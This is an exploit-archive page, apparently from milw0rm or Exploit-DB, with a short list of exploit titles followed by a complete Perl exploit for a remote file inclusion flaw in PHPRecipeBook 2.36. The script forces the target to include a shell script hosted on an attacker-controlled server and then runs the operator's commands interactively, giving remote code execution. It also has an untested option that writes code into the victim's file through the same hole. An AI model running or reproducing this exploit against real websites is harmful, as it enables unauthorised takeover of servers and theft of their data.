
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
118 lines
4.8 KiB
Perl
Executable file
118 lines
4.8 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
#####################################################################################################
|
|
# #
|
|
# PHPRecipeBook 2.36 #
|
|
# #
|
|
# Class: Remote File Include Vulnerability #
|
|
# #
|
|
# Date: 2006/10/16 #
|
|
# #
|
|
# Remote: Yes #
|
|
# #
|
|
# Type: Highly critical #
|
|
# #
|
|
# Vendor: http://phprecipebook.sourceforge.net/ #
|
|
# #
|
|
# Download: http://sourceforge.net/project/showfiles.php?group_id=65127 #
|
|
# #
|
|
# Note: Successful exploitation requires register_globals = on and magic_quotes_gpc = on #
|
|
# #
|
|
# Discovered & Exploit by: r0ut3r ( writ3r@gmail.com) #
|
|
# #
|
|
# Exploit: recipe2.36_xpl.pl #
|
|
# #
|
|
#####################################################################################################
|
|
|
|
use LWP::UserAgent;
|
|
use LWP::Simple;
|
|
|
|
$target = @ARGV[0];
|
|
$shellsite = @ARGV[1];
|
|
$shellcmd = @ARGV[2];
|
|
$file = "/classes/Import_MM.class.php?g_rb_basedir=";
|
|
|
|
if(!$target || !$shellsite)
|
|
{
|
|
usage();
|
|
}
|
|
|
|
header();
|
|
|
|
print "Type 'exit' to quit";
|
|
print "[cmd]\$";
|
|
$cmd = <STDIN>;
|
|
|
|
while ($cmd !~ "exit")
|
|
{
|
|
$xpl = LWP::UserAgent->new() or die;
|
|
$req =
|
|
HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
|
|
or die("\n\n Failed to connect.");
|
|
$res = $xpl->request($req);
|
|
$r = $res->content;
|
|
$r =~ tr/[\n]/[ê]/;
|
|
|
|
if (@ARGV[4] eq "-r")
|
|
{
|
|
print $r;
|
|
}
|
|
elsif (@ARGV[5] eq "-p")
|
|
{
|
|
# if not working change cmd variable to null and apply patch manually.
|
|
$cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> Import_MM.class.php";
|
|
print q
|
|
{
|
|
########################################################################
|
|
Patch Applied
|
|
Code added to Import_MM.class.php:
|
|
if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))
|
|
die();
|
|
|
|
NOTE: Adding patch function has not been tested. If does not complie or
|
|
there is an error, simply make cmd = null and add the patch code to
|
|
Import_MM.class.php
|
|
########################################################################
|
|
}
|
|
}
|
|
else
|
|
{
|
|
print "[cmd]\$";
|
|
$cmd = <STDIN>;
|
|
}
|
|
}
|
|
|
|
sub header()
|
|
{
|
|
print q
|
|
{
|
|
########################################################################
|
|
PHPRecipeBook 2.36 - Remote File Include Exploit
|
|
Vulnerability discovered and exploit by r0ut3r
|
|
writ3r@gmail.com
|
|
For recipe administrator testing purposes only!
|
|
########################################################################
|
|
};
|
|
}
|
|
|
|
sub usage()
|
|
{
|
|
header();
|
|
print q
|
|
{
|
|
########################################################################
|
|
Usage:
|
|
perl recipe2.36_xpl.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
|
|
<Target Website> - Path to target eg: www.recipevuln.target.com
|
|
<Shell Location> - Path to shell eg: www.badserver.com/s.txt
|
|
<CMD Variable> - Shell command variable name eg: cmd
|
|
<r> - Show output from shell
|
|
<p> - Patch Import_MM.class.php
|
|
Example:
|
|
perl a.pl http://localhost http://localhost/s.txt cmd -r -p
|
|
########################################################################
|
|
};
|
|
exit();
|
|
}
|
|
|
|
# milw0rm.com [2006-10-17]
|